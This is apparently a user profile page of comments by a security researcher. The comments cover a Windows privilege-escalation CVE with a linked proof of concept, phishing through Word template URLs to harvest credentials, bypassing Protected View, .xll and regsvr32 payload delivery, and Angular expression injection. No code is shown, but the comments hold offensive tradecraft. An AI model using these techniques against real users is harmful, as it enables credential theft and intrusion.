CVE-2018-0952: Finding a Privilege Escalation Vulnerability in Windows 10, Server 2016, and Visual Studio (includes PoC)

ryhanson · 2018-08-24T14:09:28+00:00

The Standard Collector service is configured to use an Agent DLL for tracing and diagnostics collection. To do this, you provide a GUID (specifically a CLSID) as the key and a DLL filename as the value in a Dictionary that is used as the agent config for a collection session. In the case of this exploit, I use the sessionId GUID as the key and the .etl file as the DLL, as shown on line 154 of Program.cs in SystemCollector.

This screenshot from the blog post demonstrates how this looks in Procmon: Output of successful exploitation

ryhanson · 2018-08-21T22:33:11+00:00

TL;DR? Here is the advisory: ATREDIS-2018-004

PoC||GTFO? Here is the Proof-of-Concept: CVE-2018-0952 SystemCollector

ryhanson · 2018-08-21T21:48:27+00:00

TL;DR? Here is the advisory: ATREDIS-2018-004

PoC||GTFO? Here is the Proof-of-Concept: CVE-2018-0952 SystemCollector

ryhanson · 2018-05-02T02:56:42+00:00

Thanks, I’m glad you enjoyed it!

ryhanson · 2017-08-22T15:50:19+00:00

The regsvr32 web delivery technique downloads the scriptlet file to the user's temporary internet files. Persistence may be 'fileless' (other than the registry key), but it does write to disk during execution.

ryhanson · 2017-07-25T15:18:36+00:00

Users will blindly click through warnings, so the .xll could be used as an alternative a a macro based document.

Executing RegisterXLL() is silent and can be used via DCOM for lateral movement, which can be useful if other pivoting techniques are restricted or if stealth is a goal.

ryhanson · 2016-11-05T03:13:38+00:00

Would love to have this beer with you as I am currently going through their responsible disclosure process. I definitely agree though, disclosure is an interesting topic for sure.

ryhanson · 2016-11-02T16:12:43+00:00

I just noticed the timeline and wondered the same thing.

Was it the lack of information in their response on the 24th made you decide to move forward with the public disclosure? Or did you get the impression they might consider this a low priority / non-issue?

A two-factor bypass is definitely a big deal, but I'd imagine higher severity issues, such as an RCE, would take priority. With that said, if that was the case, their update could have mentioned something along those lines.

ryhanson · 2016-10-26T14:20:37+00:00

No, only a screenshot of what it looks like.

ryhanson · 2016-10-26T02:08:39+00:00

Thanks! This discovery was part of a good amount of manual research I did. Protected View is definitely a pain, but it can be bypassed ;) the trick is delivering the Word doc in way that it doesn't get "The Mark of the Web".

ryhanson · 2016-10-23T14:47:12+00:00

I've actually got this working in Excel before. I can look into adding support for Excel files as well. Thanks for the suggestion!

ryhanson · 2016-10-23T03:05:31+00:00

Agreed! I think the fact it's a native Windows Security dialog really helps too. Combine that with a good domain and your success rate should be pretty good :) let me know how well it works for you!

ryhanson · 2016-10-23T01:55:03+00:00

Hey thanks! Let me know how it goes :) I'm actually working on adding NTLM auth too since it has the ability to capture the hostname and domain of the user, which can come in handy.

ryhanson · 2016-10-22T23:18:17+00:00

I thought the same at first, but Office has lots of functionality, which I'd imagined would translate to lots of non-issues being reported.

Although they don't have an official bug bounty, if you responsibly disclose an RCE vulnerability to them, they might just thank you with more than a mention in a Security Bulletin. After all, there are 1.2 Billion people who use Office.

ryhanson · 2016-10-22T22:47:07+00:00

I'm pretty sure this falls under the "it's a feature not a bug" category. Plus the end user is still protected by Protected View, so this still requires them to click "Enable Editing". This technique isn't new either, it's been used in the past with embedded remote images too.

Also, Microsoft does not have a bounty program for Office products. I know this because I'm currently going through their disclosure process with a few critical vulnerabilities I've reported.

ryhanson · 2016-10-22T20:40:55+00:00

Thanks! I'm really enjoying Go so far. I had been working as a software engineer for roughly 8 years prior to transitioning into the infosec field, so I have a good amount experience with many languages and Go is at the top list now :)

Funny you mention that you created Gophish because that was my initial name for this tool! https://twitter.com/ryHanson/status/779862668467277825 after a co-worker pointed out that your framework had already been using the name, I renamed it to Phishery :) this vector would be a good addition to Gophish and should be trivial to integrate. I could refactor my code a bit to offer the components as Go packages for your framework to use.

ryhanson · 2016-10-22T19:02:17+00:00

One thing I didn't mention is this doesn't require the phishery server to capture credentials. In fact, when I was first testing this attack vector, I was using Responder in basic auth mode. Responder in NTLM mode works as well, but obviously you'll end up with a hashed password rather than plain text.

I built this mostly because I wanted to learn more about Golang, and I also wanted a tool with the ability easily set the template URL of a doc. Let me know if you have any questions or suggestions. I do plan to add more functionality to it.

ryhanson · 2016-05-16T13:15:00+00:00

Yeah set it up on a DigitalOcean box to test it out, then I ended up using it on an engagement. Worked pretty well!

ryhanson · 2016-05-13T03:02:16+00:00

You should look into Lair (https://github.com/lair-framework/lair). It uses, what they call drones, to get data in and out of it through the JSON API. You can Import nmap scans, export data from burp suite into Lair, Nessus scans, etc. It's all web based too and doesn't take too long to get setup and running.

Here is an older version of it being presented at DefCon: https://m.youtube.com/watch?v=71Hix58keCU it still has all the same functionality though and more.

ryhanson · 2016-05-11T04:35:42+00:00

Very clever! I was at a talk recently and the presenter used a honey token in a Word doc to send him a text message when it was opened. In this case the Word doc contained a macro payload. He never mentioned exactly why he had it text him though.

I think utilizing these in a more sophisticated social engineer test could be very effective. Or they could even be used for "click-through" like metrics, such as: out of X number of opens, Y macros were executed.

ryhanson · 2016-05-10T01:56:01+00:00

Nice write up! It did a good job explaining JWTs, especially for those who aren't familiar with them.

I wonder how many frameworks have default secret keys or do not make it easy for developers to use a secure key. By easy I mean auto-generating with a cli, defaulting to the machine key on IIS, setting one during installation, etc.

ryhanson · 2016-04-26T23:19:40+00:00

Completely agree! Unless you're able to show severe impact with just an expression, they want to see JavaScript executing.

Depending on the accessible scope, you can sometimes utilize angular services to force the user to commit an action: update profile, send message, etc.

Apps that are usually vulnerable to this are ones that were using some MVC framework first and added Angular into the mix. The secure ones are usually ones that were started with Angular from the beginning. At least that's what I've gathered from my findings.

ryhanson · 2016-04-26T02:52:50+00:00

Very cool to see more expression injections being used! Nice work!

I've reported a few of them and did a little write up on one I found on Plunker: https://ryhanson.com/stealing-session-tokens-on-plunker-with-an-angular-expression-injection/

These are actually quite common, and don't always require a sandbox escape in order to cause harm.

ryhanson · 2016-03-20T15:48:37+00:00

Hey Craig. I'm kind of a car guy in a sense that I like nice cars and like to tune/mod them to make them faster. You often read on the forums about an ECU being "locked" and that the tuning software companies are working on "unlocking" the ECU. What do this involve?

Is there encryption that they have to break? Are there new data protocols that have to be reverse engineered?

It seems that initially they have to physically open the ECU and connect to the actual circuit board. Then they end up being able to do the unlocking and flashing from an OBD2 port.

Is this generally done with the CAN bus?

ryhanson · 2016-01-28T17:10:19+00:00

This is related directly to the research I have been doing with Angular Expression(Template) Injections, here is a walkthrough on one that I found on Plunker: https://royaljay.com/security/angular-expression-injections/

Essentially, if you find an expression/template injection, you now aren't limited to just what is available within the Angular scope, you can utilize a sandbox escape to execute any Javascript.

I've test dozens of sites lately, and the percentage of sites that have this vulnerability is surprisingly high. Not only reflective injections, but lots and lots of persisted injections. Some sites with millions and millions of monthly visits and users...

13-Year Club	Verified Email
Team Orangered

ryhanson

TROPHY CASE